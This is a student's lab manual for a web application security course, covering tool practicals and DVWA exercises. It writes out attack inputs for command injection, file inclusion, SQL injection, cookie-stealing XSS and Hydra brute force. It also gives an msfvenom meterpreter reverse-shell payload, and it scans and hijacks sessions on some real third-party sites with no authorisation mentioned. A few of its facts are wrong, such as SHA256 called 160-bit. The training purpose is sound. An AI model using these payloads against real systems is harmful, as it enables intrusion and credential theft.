Narnarayan Shastri Institute of Technology

Institute of Forensics Sciences and Cyber Security

M.Sc. Cyber Security

Semester - I (2024-25)

Lab Manual
Subject: Web Application Security Laboratory

Subject Code: CTMSCS SI L2

Name: Falak Prajapati

Enrolment No. : 240043001020
 CERTIFICATE

THIS IS TO CERTIFY THAT Mr./Ms. _________________________________________WITH

ENROLLMENT NO._____________________________ OF M.Sc. CYBER SECURITY, SEMESTER:

_______ YEAR 2024/25 HAS SATISFACTORILY COMPLETED THE LAB PRACTICAL WORK IN

WEB APPLICATION SECURITY LABORATORY (SUBJECT CODE: CTMSCS SI L2)

PLACE:

DATE OF SUBMISSION:

SIGNATURE
SIGNATURE
FACULTY
PRINCIPAL
 INDEX

Sr. No. Title Page Signature

No.
1. Analyzing HTTP Traffic Using Wireshark. 1
2. Ensuring Data Authenticity: Calculating and 5
Verifying Hash Values with HashCalc
3. Exploring Common IDOR Attack. 8
4. Automated Subdomain Enumeration Using 12
Sublist3r.
5. Analyzing Binary Files with a Hex Editor. 16
6. Network Discovery and Vulnerability 20
Scanning with Nmap.
7. Web Application Security Scanning with 23
Nikto.
8. Using Wappalyzer for Web Technology 29
Fingerprinting.
9. Directory and Subdomain Enumeration 32
Using Gobuster.
10. Web Application Directory and File Brute- 34
Forcing with Dirbuster.
11. Web Application Security Testing with Burp 38
Suite.
12. Session hijacking using cookie. 42
13. Enumeration techniques in Penetration 45
testing.
14. Web Application scanning in Nessus. 46
15. Web application techniques using OWASP 49
ZAP.
16. Techniques with burp suite. 51
17. Penetration DVWA - easy, medium, hard. 55
18. Develop remote cell application using MSF 91
venom.
 Practical – 1. Analyzing HTTP Traffic Using
Wireshark.
Aim: To analyze HTTP traffic using Wireshark in order to understand how the
HTTP protocol functions, including request and response flows, headers, and
data payloads. This analysis helps identify performance issues, troubleshoot
network problems, and enhance understanding of web communication.

Definition: Wireshark is a network protocol analyzer used to capture and

inspect data packets traveling through a network. HTTP (Hypertext Transfer
Protocol) is the foundational protocol for web communication. Analyzing HTTP
traffic with Wireshark involves examining the interactions between clients and
servers, such as HTTP requests (GET, POST, etc.), responses, and the
associated headers and payloads.

Step 1 : Download Wireshark and Install Wireshark.

https://www.wireshark.org/download.html Install The Wireshark Tool

1
Step 2: Select the current interfaces from shown all interfaces.

Step 3: Search Test login page for test password grabbing.

2
 Step 4: Add username and password to login in vulnerable website.

Step 5: Search and apply a filter or method. E.g.

http.request.method==POST

3
Step 6: Click on the last line and then click on the last line which is HTML for
URL Encoded.

Step 7: Finally, we achieve our aim to find username and password.

Conclusion:

To sum up, capturing passwords with wireshark does work via

unencrypted traffic, meaning HTTP, FTP, Telnet or even POP3. If you
just filter for specific traffic and look into the packet details, this may
reveal passwords in plaintext. On the other hand, to get passwords out of
encrypted traffic like HTTPS; we cannot do this unless we have access to
decryption keys. Monitoring network traffic must be done in compliance
with applicable laws and regulations regarding privacy.

4
 Practical – 2. Ensuring Data Authenticity: Calculating
and Verifying Hash Values with HashCalc

Aim: To understand and demonstrate the use of HashCalc for calculating and
verifying hash values, ensuring data authenticity and integrity in digital files.
Definition: HashCalc is a utility tool used for generating hash values
(checksums) of files or text data using various algorithms (e.g., MD5, SHA-1,
SHA-256). Hash values are unique digital fingerprints that enable verification
of data integrity and authenticity by comparing calculated and provided hash
values.

Step 1: Install HashCalc, selecting all of the defaults. Once one completes the
installation routine, the following screen will appear.

5
Step 2: Select the file of which you wants to calculate the Hash value.

Step 3: On the left column of Hash Calc one will see a list of all the hashing
algorithms that the application supports. The options presented are :

MD5 represents 128-bit hashing algorithm

1. MD4 represents 128-bit hashing algorithm
2. SHA1 represents 160-bit hashing algorithm
3. SHA256 represents 160-bit hashing algorithm
4. SHA384 represents 384-bit hashing algorithm
5. SHA512 represents 512-bit hashing algorithm
6. RIPEMD 160 represents 160-bit hashing algorithm
7. PANAMA represents 192-bit hashing algorithm
8. TIGER represents 160-bit hashing algorithm
9. MD2 represents 128-bit hashing algorithm
10. ADLEA32 represents 32-bit hashing algorithm
11. CRC32 is not considered a forensic hashing algorithm.

6
Step 4: Select one by one and click on the continue. You found output as
follow.

Conclusion:
This practical shows you how to use Hash Calc to produce hash values that
can be used to confirm file integrity and test data authenticity. In
cybersecurity, hash functions are used to detect tampering and verify files.

7
 Practical – 3. Exploring Common IDOR Attack
Vectors: A Practical Guide Using IDOR Tool

Aim: The aim of this guide is to provide a practical understanding of common

IDOR attack vectors and demonstrate the use of an IDOR tool for identifying
and mitigating these vulnerabilities. By exploring real-world scenarios, this
guide seeks to equip developers, testers, and security professionals with the
skills to secure applications against unauthorized data access.
Definition:
Insecure Direct Object Reference (IDOR) is a type of vulnerability that occurs
when an application provides direct access to objects (such as files, database
records, or user information) without proper authorization. Attackers exploit
this flaw by manipulating input parameters (e.g., URLs, query strings, or API
requests) to access unauthorized data or resources.

Step 1: Log in to Altoro Mutual

Open your browser and navigate to http://altoro.testfire.net.
Log in using demo credentials:
Username: admin
Password: admin

8
Step 2: Navigate to the Transaction History Page
After logging in, go to the "View Recent Transactions" page. Observe
the URL in the browser when viewing the transactions

Step 3: Identify the Vulnerable Parameter

9
 Notice the parameter accountid=800000 in the URL.This parameter is
likely controlling which account's transactions are displayed.
Step 4: Test for IDOR
Modify the account id in the URL to a different value (e.g., account id=800007)
and press Enter. If you can view the transactions of another account without
proper authorization, the application is vulnerable to IDOR.

Conclusion :

10
IDOR vulnerabilities pose a significant security risk, as they allow attackers to
bypass authentication and access sensitive data. Understanding common attack
vectors and utilizing tools for detection are critical steps toward mitigating this
risk. By integrating secure coding practices, regular security assessments, and
IDOR testing tools into the development lifecycle, organizations can safeguard
their applications and protect user data effectively.

11
 Practical – 4. Automated Subdomain Enumeration
Using Sublist3r
Aim: The primary aim of automated subdomain enumeration using Sublist3r is
to: Identify all subdomains associated with a target domain.
Map the organization’s digital footprint for security assessments.
Discover exposed services or assets that could be vulnerable to attacks.
Enhance reconnaissance efficiency by automating the subdomain discovery
process.

Definition:
Automated Subdomain Enumeration Using Sublist3r involves using the
Sublist3r tool to identify and gather subdomains of a target domain. Sublist3r
leverages various online resources like search engines, DNS records, and APIs
to perform this task. It is commonly used in penetration testing and
reconnaissance to uncover potential attack vectors.

Step 1: Download and install

Clone the Sublist3r repository from GitHub:
git clone https://github.com/aboul3la/Sublist3r.git

12
Step 2: Open a terminal or command prompt and write sudo su.

Step 3: Clone the Sublist3r repository from GitHub by running

Step 4: Navigate to the Sublist3r Directory and After cloning, move into the
Sublist3r folder by typing : cd Sublist3r And also copy that above link of
sublist3r GitHub.
Step 5: Install the required Python libraries using the following command: pip
install -r requirements.txt

13
Step 6: Use Sublist3r for Subdomain Enumeration , Run the following
command to find subdomains for a target website:
python sublist3r.py -d google.com

Conclusion:

14
Automated subdomain enumeration using **Sublist3r** is a critical step in
reconnaissance during penetration testing or security assessments. Sublist3r
simplifies the process of discovering subdomains by leveraging multiple
sources, such as search engines, APIs, and DNS queries, to identify potential
attack surfaces efficiently. By automating this task, security professionals can
save time and uncover hidden subdomains that may contain vulnerabilities. This
process strengthens overall security by enabling organizations to gain better
visibility into their domain infrastructure and address potential risks
proactively..

15
 Practical – 5. Analyzing Binary Files with a Hex Editor

Aim: The aim of analyzing binary files with a hex editor is to:
 Understand the internal structure and data layout of binary files.
 Identify hidden information, metadata, or potential malicious code.
 Debug, repair, or modify binary files during software development or
reverse engineering.
 Extract meaningful information for forensic investigations or malware
analysis.

Definition: Analyzing Binary Files with a Hex Editor involves examining the
raw hexadecimal and binary content of a file using a hex editor. A hex editor
displays data in hexadecimal format alongside its ASCII representation,
allowing for in-depth inspection of a file's structure, metadata, and hidden
information. This process is widely used in fields like reverse engineering,
forensics, and debugging.
Step 1:Rename the selected file to .pdf extension from .exe extension
.So the format will be changed.

16
Step 2: Install a Hex Editor and Open the Hex Editor and also Load a
Sample File
Click on File > Open in the Hex Editor.
Choose a file you want to analyse For example, open a .txt file or .jpg
image or any other file.So now first of all save your changes and
Open that modified file and see the changes.

Step 3: Now you can see different values as shown as bellow :

17
 Step 4: In first line you can see that a value shown as … 4d 5a….

Step 5: Go to browser and go to https://www.garykessler.net/

Then search the 4d 5a .
Step 6: It shows you that the file format is .EXE

18
Step 7: Now change the extension from .pdf to .exe

Step 8: The file is became as before it is.

19
Practical - 6. Network Discovery and Vulnerability Scanning with
Nmap
Aim: The aim of network discovery and vulnerability scanning with Nmap is to:
 Detect active hosts and devices within a network.
 Identify open ports, running services, and their configurations.
 Uncover security vulnerabilities and misconfigurations.
 Enhance network security by providing actionable insights to mitigate
risks.
 Support compliance efforts by ensuring network security posture aligns
with best practices.
Definition: Network Discovery and Vulnerability Scanning with Nmap refers
to the process of using Nmap (Network Mapper), an open-source network
scanning tool, to identify devices, services, and vulnerabilities within a network.
Nmap enables security professionals and administrators to gather details about
active hosts, open ports, and potential risks by performing scans and analyzing
network configurations.

Step 1: Open Terminal and enter nmap -h

Where -h means the help menu of Nmap, providing an overview of its
options and functionalities.

20
Step 2: Now, we will scan five websites by following this command :
sudo nmap -sS website_name
Here, the -sS option in Nmap performs a TCP SYN Scan, which is one
of the most popular and widely used scan techniques.

21
Conclusion:
In this practical, we explored the capabilities of Nmap as a powerful tool
for network discovery and vulnerability scanning. By performing various
scans, including host discovery, port scanning, service detection, and
vulnerability assessment, we were able to identify active devices, open
ports, running services, and potential security weaknesses within a
network.

22
 Practical - 7. Web Application Security Scanning with
Nikto.

Aim: Nikto is an open-source scanner designed to detect vulnerabilities in web

applications and servers. It performs scans to identify over 6,700 potentially
risky files, outdated software, misconfigurations, and other security concerns.
Primarily aimed at security professionals, Nikto provides a fast and efficient
way to assess the security of web servers.
Definition: Web Application Security Scanning with Nikto involves using
Nikto, an open-source vulnerability scanner, to assess the security of web
servers and applications. Nikto scans for outdated software, misconfigurations,
common vulnerabilities, and potentially dangerous files or directories. It is a
vital tool in identifying weaknesses in web applications and servers.
Step 1: Open Nikto Using This Command [ nikto ]

23
Step 2: Here we select https://www.thenews.com.pk to identify the
vulnerabilities. Next we using “nikto -h https://www.thenews.com.pk -Tuning
2” this command to check any misconfigurations in that website.

 -h : Specifies the host to scan (in this case, we use https://google-

gruyere.appspot.com this website).

 -Tuning : IT is used to specify which types of tests to perform during a

scan. This allows users to customize the scan based on their specific

interests or the vulnerabilities they want to investigate.

24
Step 3: Misconfiguration - Focuses on identifying misconfigurations in the

web server setup

Step 4: Identify Sensitive Files and Directories

 To locate hidden or sensitive files and directories that may be exposed.

Step1: Here we select “http://pakchanewdelhi.org.pk” to identify the

vulnerabilities.
Step 5: next we using “nikto -h http://pakchanewdelhi.org.pk -Tuning 1” this
command to check and identify sensitive Files and Directories.
 -h : Specifies the host to scan (in this case, we use
http://localhost:3000/#/ this website)

 -Tuning : IT is used to specify which types of tests to perform during a

scan. This allows users to customize the scan based on their specific
interests or the vulnerabilities they want to investigate.

25
Step 6: Interesting File/Directory - Looks for potentially interesting files or
directories.

To identify potential information disclosure issues like server versions or error

messages
Step 7: Here we select “https://www.thenews.com.pk” to identify the
vulnerabilities.
Step 8: Next we using “nikto -h www.thenews.com.pk -Tuning 3” this
command to detect information disclosure
 -h : Specifies the host to scan (in this case, we use
https://www.thenews.com.pk this website)

 -Tuning : IT is used to specify which types of tests to perform during a

scan. This allows users to customize the scan based on their specific
interests or the vulnerabilities they want to investigate.

26
Step 9: Injection - Targets injection vulnerabilities, including SQL injection and
command injection.

27
28
 Practical 8 : Using Wappalyzer for Web Technology
Fingerprinting
Aim:
The aim of this practical is to familiarize participants with the process of
identifying and analyzing the technologies used by a website through web
technology fingerprinting. Specifically, the practical will focus on using
Wappalyzer, a powerful tool for detecting various technologies,
frameworks, and software components that power a website or
web application.

Step 1: Using Wappalyzer Browser Extension

Chrome: Install Wappalyzer from the Chrome Web Store

Step 2: Adding Wappalyzer extension In Chrome

29
Step 3: Wappalyzer has been installed successfully.

Step 4: Go to a particular website(e.g. flipkart.com) and then on the

wappalyzer extension

30
Conclusion:
Wappalyzer can be used for web technology fingerprinting, a technique
essential for security assessments, competitive analysis, and technology
stack optimization. While Wappalyzer is a powerful tool for detecting the
technologies behind a website, it is important to remember that it is only
a starting point for deeper analysis. For comprehensive security
assessments, Wappalyzer should be supplemented with additional
security tools and techniques to ensure a thorough evaluation of potential
vulnerabilities.

31
 Practical 9: Directory and Subdomain Enumeration
Using Gobuster
Aim:
The aim of this practical is to provide participants with a hands-on
experience in performing directory and subdomain enumeration using
Gobuster, a tool widely used in web application reconnaissance. The
practical will help participants understand how to identify hidden
directories, files, and subdomains that might not be easily discovered
through normal web browsing but could pose potential security risks.

Step 1: Prior to install Gobuster.

Step 2: Go to a particular website (e.g. https://altoromutual.com) to find

hidden directories and files in it

32
33
 Practical 10: Web Application Directory and File Brute-
Forcing with Dirbuster
Aim
The aim of this practical is to provide participants with hands-on experience in
performing directory and file brute-forcing attacks on web applications using
DirBuster, a widely used tool in web application penetration testing. This
process helps to identify hidden directories, files, and resources on a web server
that are not directly accessible through standard browsing, and could potentially
expose security vulnerabilities.

Step 1: Search Dirbuster in Web Crawlers & Directory Bruteforce via Web
Applications Analysis in Linux.

Step 2: After opening Dirbuster you will see on the screen like this:

34
Step 3: Target website(e.g. http://testphp.vulneb.com:80) and select its list info.

Step 4: After selecting list info you have to enter

usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt in File with list of
dirs/files and then click on start button.

35
Step 5: After clicking on start button you will see scan information of this target
website.

36
Conclusion:
In this practical, we demonstrated the use of Dirbuster to perform directory and
file brute-forcing on web applications. Dirbuster, with its GUI-based interface
and extensive wordlists, is an effective tool for discovering hidden directories,
files, and other resources on a target web server.

37
Practical 11: Web Application Security Testing with Burp
Suite.

Aim
The aim of this practical is to provide participants with a thorough
understanding and hands-on experience in conducting web application security
testing using Burp Suite, a leading tool for identifying security vulnerabilities in
web applications. This practical will guide participants through both manual
testing techniques and automated scanning processes to discover and assess a
range of common security vulnerabilities, such as SQL injection, Cross-Site
Scripting (XSS), Cross-Site Request Forgery (CSRF), and security
misconfigurations.

Step 1: Download BurpSuite from the following link

https://portswigger.net/burp/communitydownload

Step 2: Select the proxy and Go to Open browser

38
Step 3: Now target a website i.e. here’s https://google.com/

Step 4: Then turn off the intercept

39
Step 5: Finally we are capturing the request to check in HTTP history

Conclusion:

40
This practical highlighted the importance of security testing for identifying and
mitigating vulnerabilities in web applications. By using Burp Suite, we were
able to simulate real-world attack scenarios, ensuring a deeper understanding of
application security and enhancing the ability to safeguard web applications
against potential threats.

41
 Practical 12: Session hijacking using cookie

Aim:
Session hijacking occurs when an attacker gains unauthorized access to a user's
session state. By stealing a valid session ID, the attacker can infiltrate the
system and potentially access sensitive data. One well-known example of a
session hijacking tool is WhatsApp Sniffer. The first notable session hijacking
attack took place on Christmas Day in 1994, carried out by Kevin Mitnick when
HTTP 0.9 was in use.

Step 1: Go to a website that is here we are going to meesho.com

Step 2: Going to Cookie Editor which is already added in the extension and
export as JSON

42
Step 3: Import JSON to the other browser

Step 4: Then copy JSON import code in the other browser

43
Step 5: Login successfully with using cookies

Conclusion:
In this practical, we explored how session hijacking can be performed by
exploiting vulnerable session management mechanisms through the use of
cookies. This attack emphasizes the critical importance of securing session
cookies in web applications to prevent unauthorized access.
44
 Practical 13: Enumeration techniques in Penetration
testing
Aim:
To explore enumeration methods for gathering system information. Here I use
the “Amass” tool for enumeration in penetration testing.
Amass is a powerful open-source tool used for reconnaissance and enumeration
in penetration testing. It focuses primarily on discovering assets related to a
target domain, such as subdomains, IP addresses, and associated networks

Steps:
1. Open “Terminal” in kali linux
2. Type “amass enum -d www.netlify.com | column -t”
Where; enum = subcommand for performing enumeration tasks with Amass,
-d = target domain, www.netlify.com = target, column -t = create a table by
aligning the output into columns.

Conclusion: Effective enumeration reveals critical details about the target

system, aiding penetration testing efforts.

45
 Practical 14: Web Application scanning in Nessus

Aim: To perform a vulnerability scan on web applications using Nessus.

Web application scanning (WAS) in Nessus is a capability used to
identify vulnerabilities, misconfigurations, and weaknesses in web applications.
While Nessus primarily focuses on traditional network and host-based
vulnerabilities, its Web Application Scanning functionality can provide
significant insights into application-layer risks.
Steps:
Step 1: Install and enable Nessus tool
Step 2: Register and login to Nessus
Step 3: Click on “create a new scan”

46
Step 4: Then click on “Basic Network Scan”

Step 5: Then give Name, Description, and Target and click on “Save”

47
Step 6: Then click play button to launch the scan.

Step 7: Once scan done open the scan

Conclusion: Nessus identifies vulnerabilities and compliance issues, facilitating

proactive risk management.

48
 Practical 15: Web application techniques using OWASP
ZAP
Aim: To detect web application vulnerabilities using OWASP ZAP.
Steps:
1. Install Zaproxy
2. Select Automated Scan
3. Give URL for attack. In my case I give “http://altoro.testfire.net/”. And
click on Attack

4. Go to the Alert tab where we can see all file details of

http://altoro.testfire.net/

49
Conclusion: OWASP ZAP simplifies vulnerability detection, promoting secure
web application development.
Practical 16: Techniques with burp suite

Aim: To use Burp Suite for advanced security testing techniques.

50
1.Proxy
Captures and allows manipulation of HTTP/S traffic between your browser and
the target server.
Steps:
1. Go to the proxy and turn on intercept
2. Request any thing in browser
3. It gives requests of browser

2. Target

Helps you define and manage your scope, mapping out the application structure
and tracking identified issues.
Steps:
1. Intercept any Request
2. Go to the Target tab Intruder

51
3.Add variable to username and password

4.Select “Cluster Bomb Attack”

52
5.Create username.txt and password.txt files

6. Load username.txt file

7. Select Payload position = 2 and Payload type = Runtime file
8. Select password.txt file
9. Click on “Start Attack”

53
0. It shows the result. If length of any request is greater Than “0” request Then
it was correct credential

Conclusion:
Burp Suite enhances testing capabilities, allowing identification and
exploitation of complex vulnerabilities.

54
 Practical 17 : Penetration DVWA - easy, medium, hard.

Aim: The aim of penetrating the Damn Vulnerable Web Application (DVWA)
is to practice and enhance web application security testing skills by exploiting
known vulnerabilities in a controlled environment. It helps security
professionals and learners understand common web vulnerabilities and their
exploitation methods.
Definition: DVWA (Damn Vulnerable Web Application) is a deliberately
vulnerable web application designed for security testing and learning purposes.
Penetration testing of DVWA involves exploiting vulnerabilities such as SQL
injection, cross-site scripting (XSS), command injection, and insecure file
uploads to gain insights into how these weaknesses operate and how to mitigate
them in real-world applications.
Brute Force Attacks
Brute force attacks involve systematically attempting all possible combinations
of usernames and passwords to gain unauthorized access. The difficulty levels
in DVWA simulate different levels of defences against brute-force attacks.
Here’s how to approach each level:
Low Security Level:
 Example Hydra Command:

hydra -l admin -P SecLists/Passwords/2020-

200_most_used_passwords.txt 127.0.0.1 http-get-form \
"/DVWA/vulnerabilities/
brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:
security=medium; PHPSESSID=em9smneejvkmrn41g4f7dvavgv:Username
and/or password incorrect." -V

55
 i. Medium Security Level && Hard Level

Step 1: capture the req.

56
Step 2: attack the brute force attack on the log in page

 Select the log In credential like username and password with this tool.

57
  After, set playload username file and password file

Step 3: after the get password and username then past it the website.

58
 Command Injection
Command injection is a vulnerability that occurs when an attacker can execute
arbitrary commands on a host operating system via a vulnerable application. In
DVWA (Damn Vulnerable Web Application), this vulnerability can be
exploited to understand different security levels. Here's how it works at each
security level in DVWA:
I. Low Security Level

Steps:
1. Login to DVWA and navigate to the "Command Injection" section.
2. Start with Low Level and gradually move to higher levels.
3. Use inputs like: 127.0.0.1;pwd

II. Medium Security Level

Here, some basic sanitization is applied, but it can often be bypassed

Steps:
1. Login to DVWA and navigate to the "Command Injection" section.

59
2. Start with Medium Level and gradually move to higher than previous
level.
3. Use inputs like:
• 127.0.0.1&pwd

Step 2: click submit and show the output.

60
High Security Level:
At this level, stronger sanitization techniques are applied, like filtering user
input more rigorously.
Step 1: Use inputs like : 127.0.0.1|ls

61
Step 2: You can enter with using this symbol like | which are not blocked

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is a type of attack where an attacker tricks a
victim into making an unwanted request to a web application on which the
victim is authenticated. This can lead to unintended actions such as changing
account settings, making financial transfers, or deleting data without the victim's
knowledge.
1. Low Level:
At this level, DVWA provides a very basic demonstration of CSRF
vulnerabilities. The application will not have protections such as anti-CSRF
tokens or validation mechanisms. CSRF attacks can be executed easily.
Steps:1 Go to the CSRF
Step 2. Here in low security we can easily change password by changing the url

62
2. CSRF Attack (Medium)
At the medium level, DVWA introduces some basic protections, like a CSRF
token, to prevent simple CSRF attacks. The application now requires a token to
validate requests, which must be included with the form submission.
63
  Examine the CSRF Token:

o When you try to submit the form to change your password, you will notice a
CSRF
token field hidden in the form.
o This token is included in the form to ensure that the request is legitimate and
not
forged by an attacker.
o Capture the CSRF Token:

o Open the developer tools in your browser (F12) and inspect the page to find
the
CSRF token.

Create the Malicious Request with CSRF Token:

o Modify your malicious HTML form to include the CSRF token:

64
CSRF Attack (Hard)
At the hard level, DVWA adds additional protection mechanisms, such as
stricter token validation and possibly referrer checking, making it even harder to
perform a CSRF attack.
Steps:
1. Navigate to the CSRF Page:
Go to the CSRF page in DVWA.
2. Examine the Advanced Protection Mechanisms:
At this level, DVWA may check for the referrer header in the request. This
helps ensure that the request is coming from the correct domain. If the referrer
is not valid, the request will be rejected.
3. Bypass CSRF Token with Advanced Techniques:
Even if you manage to capture the CSRF token, DVWA may require additional
verification, such as ensuring the referrer matches the application domain. In
some cases, attackers may try Cross-Site Scripting (XSS) or use third-party
tools to manipulate headers and bypass these protections.
65
4. Execute the Attack:
To exploit this vulnerability at the hard level, you may need advanced
techniques,
like: Using a proxy tool (e.g., Burp Suite) to manipulate HTTP headers. 50
Scripting attacks to simulate valid requests with the correct referrer header and
token.
5.Observe the Result:
If the CSRF attack is successful despite these protections, it indicates a weak
implementation of security mechanisms. However, a properly implemented
CSRF protection would reject the malicious request.

File Inclusion (Easy)

At the easy level, DVWA provides no protection against file inclusion attacks,
allowing direct
exploitation.
Step: change the url like : Replace the page parameter value with
../../../../etc/passwd
66
File Inclusion (Medium)
At the medium level, the application attempts to sanitize the input by removing
http:// and https:// from the page parameter. However, it still does not validate
the content of the page parameter for directory traversal or malicious paths.
These lines remove http:// and https:// from the page parameter, preventing
remote
file inclusion.
1. Test for Local File Inclusion (LFI):
o Since directory traversal is not blocked, attempt to include sensitive local
files:
http://192.168.1.39/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd

67
File Inclusion (Hard)
At the hard level, DVWA adds stronger protections, such as strict input
validation and whitelist-based inclusion.
o Try Bypassing with Encoding:

o Use URL encoding for directory traversal:

http://192.168.1.39/dvwa/vulnerabilities/fi/?page=..%2f..%2f..%2f..%2fetc
%2fpasswd

68
 File upload: easy mode
Step 1: For Low create One php file and enter the above script in that

Step 2: Now upload the file it will successful uploaded

69
Step 1: For Medium just change the php to jpg as it supports jpg | jpeg | png etc.
Step 2: After changing file extension upload the file it will successfully
uploaded

70
[Hard ] Step 1: For High install sudo apt install exiftool

71
Step 2: upload a file with upload box
Step 3: After then download any jpg/jpeg.png image and put it in same where
the php file is created

SQL Injection easy

o 1.For Low Security we can enter 1’ ‘OR ‘1’=’1’ – as I have given
command 1’ union select 1,2#

72
Medium:
Step 1: we can not enter with sql command in command box
Step 2: but, send req. to interpreter and modify req. with sql command

73
Step 3: after, the modify sql command then send req, to forward in database
With this we can enter any of command run in sql data base;
o This command like: union select user, password from dvwa.users limit
0,1#

Hard:
Step 1: in this type of attack first we can enter with some type of command
Like: union select user, password from dvwa.users limit 0,1#

74
Step 2: just type this command in the box and you can access the date base of
the website
Step 3 : you can see below, just type and send to date base and get the list of
user table with credentials.

75
 Weak Session ID:
Step 1: For the Low security level, click "Generate," view the source code at the
bottom, or use Burp Suite to inspect the cookie and request details.

Step 3: In Medium and High modes, calculate the session ID's timestamp and
date.
Step 4: Use Burp Suite to capture the request, extract the cookie, and decode it
using the Epoch Converter website.

76
 CSP Bypass:
Step 1: For Low open-source code and paste the http link given in the source
code to produce output.

Step 2: For Medium open the source code and paste the link or you can enter
using burp suite
also.

77
 Cryptography:
Step 1: Set DVWA security levels to Low, Medium, and High to perform all
tests.
Step 2: Encode and decode messages using the appropriate formulas, including
MD5 hashing.

78
 XSS DOM: (easy)
Step1: For Low Select default language and add <script>("XSS")</script> in
URL and Enter it will alert ‘XSS’ on Screen

Step 2: Same for getting cookie value add <script>alert

(document.cookie)</script>

79
Medium :
Step 1: For Medium add #<script>alert("Hello")</script> in URL

80
Step 2: Same for getting cookie value add #<script>alert
(document.cookie)</script>

81
Hard:
Step 1: For High add #<script>alert("XSS")</script> in URL

82
Step 2: Same for getting cookie value add #<script>alert
(document.cookie)</script>

XSS (Reflected):

83
XSS (Reflected) Vulnerability (Easy) At the easy level, DVWA allows
unsanitized user input to be directly reflected back into the page. This makes it
very easy to inject malicious scripts.
Step 1: For Low use <script>alert("XSS")</script> in the column
o Navigate to the Reflected XSS Page:

Go to the XSS (Reflected) vulnerability page:

o http://192.168.1.39/dvwa/vulnerabilities/xss_r/.

Understand the Input Field:

o On the page, you will see a form where you can input data. This input is
not

sanitized, meaning it will be reflected directly back into the page when you
submit it.
o Inject a Malicious Script:

o In the input field, enter the following simple XSS payload:

84
Step 2. For document.cookie use command
<script>alert(document.cookie)</script>

XSS (Reflected) Vulnerability (Medium)

At the medium level, DVWA applies basic input sanitization. However, this
sanitization can still be bypassed using various encoding techniques or by
injecting the script in a more complex manner.
o Attempt Injection with Basic Script:

Try to inject a basic script as before:

o html Copy code

<script>alert('XSS Attack!');</script>
o In most cases, at the medium level, DVWA might escape certain
characters or

sanitize the input to prevent a simple attack like this.

85
 o Use Encoding to Bypass Filters:

To bypass basic sanitization, you can use URL encoding to encode characters
like <, >, and " to their respective HTML entities.

Step 3: For High use command <body onload=alert(document.cookie)

86
Verify Execution:
o If you see the alert, you've successfully bypassed the medium-level
protections and

executed a reflected XSS attack.

XSS (Stored):
At the easy level, DVWA does not sanitize or filter user input before storing it,
making it easy to inject malicious scripts into the application.
step 1: For Low use command <script>alert(document.cookie)</script>
Understand the Input Field:
o On the page, you will see a form that allows you to submit a comment. This
input is
not sanitized, meaning it will be stored and reflected when viewed by other
users.
Step 2. Inject a Malicious Script:
o In the comment field, enter the following XSS payload:

87
<script>alert('Stored XSS Attack!');</script>
Step 3. Submit the Comment:
o After submitting the form, you will see your comment reflected back on the
page.
The script will execute as soon as the page reloads.
Step 4. Verify Execution:
o If the alert box appears with the message Stored XSS Attack!, you have
successfully exploited the stored XSS vulnerability.

XSS (Stored) Vulnerability (Medium)

At the medium level, DVWA applies basic input sanitization and filters to
prevent common script injections. However, more advanced techniques can be
used to bypass these protections.
 Attempt Simple Script Injection:

o Try submitting the same script payload as before:

<script>alert('Stored XSS Attack!');</script>
o At the medium level, DVWA likely filters out <script> tags and other
common

88
  JavaScript payloads.

Use Event Handlers or Encoded Payloads:

o Since simple tags are filtered, try using event handlers or encoded payloads:
 Use an onerror event with an image:

<img src="x" onerror="alert('Stored XSS Attack!')">

 Submit the Payload:

o After submitting the form, check if the script executes. In this case, the script
should
be executed when the image fails to load, triggering the onerror event.
 Verify Execution:

o If the alert appears, you've successfully bypassed the input sanitization at the
medium level and executed a stored XSS attack.
Step 1: For Medium right click on Name and make maxlength=250 use
command <Script>alert(document.cookie)</sCRipt>

89
Conclusion: Penetration testing of DVWA provides valuable hands-on
experience in identifying, exploiting, and remediating common web application
vulnerabilities. It is an essential training tool for developers, security
professionals, and ethical hackers to build a deeper understanding of web
application security and enhance their ability to protect real-world systems from
similar threats.

90
 Practical 18: Develop remote cell application using MSF
Venom.

Aim:
To create a remote cell application payload using MSFVenom.

Step 1: Checking the IP address

For checking the IP address of the host machine. Type the command in your
terminal and remember the IP address
If config

Step 2:Payload creation

Now I will make a payload using msfvenom the command is…

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.165
LPORT=4444 -f exe > /var/www/html/door.exe
-p -> For payload
LHOST -> For configuring the system ip address
LPORT -> For configuring the port
91
-f -> for file type
> -> for saving the file in given address
Step 3: Reverse Shell Creation
Now I will metasploit framework to create a Meterpreter shell..
Type the given command in the terminal to start the Metasploit framework
msfconsole

Step 4: for creating a meterpreter shell in metasploit framework is

use multi/handler
Now I have to set payload that I have given in making of msfvenom payload
set payload windows/x64/meterpreter/reverse_tcp
Configure the host IP for the reverse shell
Type the given command for seeing the detail of given shell
show options

92
Conclusion:
MSF Venom demonstrates the creation of effective payloads, highlighting the
need for robust endpoint protection.

93